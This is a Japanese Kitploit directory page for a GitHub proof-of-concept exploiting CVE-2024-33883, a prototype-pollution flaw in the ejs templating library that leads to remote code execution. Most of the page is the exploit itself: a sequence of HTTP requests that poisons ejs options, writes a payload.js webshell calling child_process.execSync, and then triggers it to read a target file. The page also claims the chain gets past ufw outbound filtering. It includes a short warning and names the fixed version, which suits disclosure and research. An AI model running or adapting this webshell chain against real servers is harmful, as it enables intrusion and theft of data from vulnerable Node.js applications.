Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2024-33883 — ejsのRCE脆弱性CVE-2024-33883のPoC。 | Kitploit
ツール/GitHubGitHub/grantzile/poc-cve-2024-33883
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発
GitHubgrantzile/poc-cve-2024-33883

PoC-CVE-2024-33883

ejsのRCE脆弱性CVE-2024-33883のPoC。

リポジトリを見る
522年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-33883

[email protected]、プロトタイプ汚染の検証不備による RCE 悪用

  • プロトタイプ汚染により、opts.client を truthy な値に設定する(条件)
  • その後、render() が実行されると、ejs は opts.escapeFunction の値を JS コードとして実行します。

影響を受けるコード範囲

[email protected] に基づく

1. ejs/lib/ejs.js - 580、636、637 行目

PoC(ウェブシェル注入とアクティブ化)

root@kitploit:~
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell
  • 上記の PoC は、ufw ファイアウォールの送信パケットドロップを回避できます。

  • 3.1.10 未満のすべてのバージョンがこの種の攻撃に対して脆弱です。

これは RCE の脆弱性です。稼働中のサーバーで悪用しないでください。

攻撃が可能な条件

  1. render() を制御できる必要があります。
  2. プロトタイプ汚染の攻撃ベクトルを制御できる必要があります。
  • 上記の2つの条件が満たされると、RCE 攻撃が可能です。

この攻撃を防ぐには?

  • 修正版([email protected])が現在利用可能です。
ツールをダウンロード